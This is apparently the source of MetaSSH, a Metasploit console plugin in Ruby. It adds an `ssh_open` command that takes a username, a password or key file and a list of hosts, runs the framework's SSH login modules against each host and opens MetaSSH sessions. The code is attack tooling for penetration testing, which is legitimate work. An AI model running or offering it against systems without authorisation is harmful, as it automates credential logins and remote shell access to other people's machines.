meta_ssh.rb
#
# $Id$
# $Revision$
#
# top level constant ?!
#ARCH_SSH = "ssh" #Tried as class variable without success
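module Msf
  ###
  #
  # MetaSSH by alhazred
  # Dispatcher additions by rageltman
  #
  ###
  #
  # Console plugin. On load it registers the SSH arch type, puts the bundled
  # meta_ssh library directory on the load path, adds the bundled module
  # directory to the framework, and installs the `ssh_open` console command.
  # #cleanup undoes the dispatcher, load-path and module-path changes.
  class Plugin::MetaSSH < Msf::Plugin
    #attr_accessor :framework

    # Console dispatcher that provides the `ssh_open` command.
    class MetaSSHCommandDispatcher
      include Msf::Ui::Console::CommandDispatcher

      # Dispatcher name
      def name
        "metaSSH"
      end

      # Command list: command name => one-line description.
      def commands
        {
          "ssh_open" => "Open MetaSSH session"
        }
      end

      # Prints the usage banner for ssh_open.
      def cmd_ssh_open_help
        print_line("Usage: ssh_open [options] [hosts]")
        print_line
        print_line("OPTIONS:")
        print_line(" -l Login Username")
        print_line(" -c Credential, file or pass")
        print_line(" -f File containing hosts (from -R output for instance)")
        print_line(" -h Help Banner")
      end

      # Handles `ssh_open [options] [hosts]`.
      #
      # Collects hosts from the positional arguments and, when -f is given,
      # from the lines of that file. The -c value selects the login module:
      # if it names an existing regular file it is used as KEY_FILE for
      # login_pubkey, otherwise it is used verbatim as PASS for login_password.
      # A password that happens to equal the path of an existing file is
      # therefore treated as a key file.
      #
      # Prints the usage banner and returns without running anything when
      # -h is given, when no credential was supplied, or when no host was
      # supplied. Aborts with an error when the -f file does not exist, so a
      # mistyped path cannot silently shrink the host list.
      #
      # The credential is never echoed by this method.
      # NOTE(review): the -c value is typed on the console command line and may
      # be retained by console history or logging; confirm for the deployment.
      def cmd_ssh_open(*args)
        opts = Rex::Parser::Arguments.new(
          "-l" => [ true, "Login"],
          "-c" => [ true, "Credentials (passwd or keyfile)"],
          "-h" => [ false, "Command help"],
          # -f carries the file path as its value, so it must be declared as
          # taking an argument; declared as false the parser hands over no value.
          "-f" => [ true, "File containing hosts"]
        )

        # Parse the opts
        ips = []
        login = ''
        cred = nil
        hosts_file = nil

        opts.parse(args) do |opt, _idx, val|
          case opt
          when '-h'
            cmd_ssh_open_help
            return
          when '-l'
            login = val
          when '-c'
            cred = val
          when '-f'
            hosts_file = val
          else
            # guess it must be an address
            ips << val
          end
        end

        # Parse hosts file if one was given
        if hosts_file
          unless File.file?(hosts_file)
            print_error("Hosts file not found: #{hosts_file}")
            return
          end

          File.foreach(hosts_file) do |line|
            # drop the line terminator and surrounding blanks; skip empty lines
            entry = line.strip
            ips << entry unless entry.empty?
          end
        end

        # A credential and at least one host are required; without this check
        # a missing -c reaches File.expand_path(nil) and raises TypeError.
        if cred.nil? || cred.empty? || ips.empty?
          cmd_ssh_open_help
          return
        end

        # Configure our module
        key_path = key_file_for(cred)
        if key_path
          mod = framework.modules.create('exploit/multi/ssh/login_pubkey')
          option_name = 'KEY_FILE'
          # hand over the same expanded path that the file check was made on
          option_value = key_path
        else
          mod = framework.modules.create('exploit/multi/ssh/login_password')
          option_name = 'PASS'
          option_value = cred
        end

        # NOTE(review): create is expected to return nil when the module is not
        # available, e.g. while the plugin's loader thread is still running;
        # confirm against the framework version in use.
        unless mod
          print_error("MetaSSH login module is not loaded")
          return
        end

        mod.datastore[option_name] = option_value
        mod.datastore['USER'] = login

        # Build our range walker
        # NOTE(review): verify that RangeWalker accepts an Array here in the
        # targeted framework version.
        targets = Rex::Socket::RangeWalker.new(ips)

        # Run against each IP in the rangewalker
        targets.each do |ip|
          print_good("Running #{mod.refname} against #{ip}")
          mod.datastore['RHOST'] = ip
          mod.exploit_simple(
            'Payload' => 'ssh/metassh_session',
            'Target' => mod.datastore['TARGET']
          )
        end
      end

      private

      # Returns the expanded path when cred names an existing regular file,
      # otherwise nil.
      def key_file_for(cred)
        path = File.expand_path(cred)
        File.file?(path) ? path : nil
      rescue ArgumentError
        # expand_path raises for values it cannot expand (for example a string
        # starting with "~" followed by an unknown user name); such a value is
        # not a usable key file path, so the caller treats it as a password.
        nil
      end
    end #end dispatcher

    # Sets up the plugin: arch type, load path, module path and dispatcher.
    def initialize( framework, opts )
      super

      # register our new arch type
      # NOTE(review): ::ARCH_SSH is not assigned in this file (the top-level
      # assignment in the file header is commented out); confirm it is defined
      # before the plugin is loaded.
      ::ARCH_TYPES << ::ARCH_SSH unless ::ARCH_TYPES.include?(::ARCH_SSH)

      # add meta_ssh lib to the path
      # The directory is prepended, so files in it take precedence over
      # same-named libraries on require; it should be writable only by the
      # operator.
      $:.unshift(File.join(File.dirname(__FILE__),"meta_ssh","lib"))

      # load our modules in a separate thread and report what was added
      Rex::ThreadFactory.spawn("#{name} Module Loader", true) {
        framework.modules.add_module_path(File.join(File.dirname(__FILE__),"meta_ssh","modules")).each do |m|
          print_good("Added #{m.last} #{m.first.capitalize} modules for metaSSH")
        end
      }

      # load the dispatcher
      add_console_dispatcher( MetaSSHCommandDispatcher )
    end

    # Removes the dispatcher, the load-path entries and the module path.
    def cleanup
      remove_console_dispatcher( 'metaSSH' )
      # removes every load-path entry containing "meta_ssh/lib", not only the
      # one added by initialize
      $:.delete_if {|e| e =~ /meta_ssh\/lib/}
      framework.modules.remove_module_path(File.join(File.dirname(__FILE__),"meta_ssh","modules"))
    end

    # Plugin name
    def name
      "metaSSH"
    end
  end
end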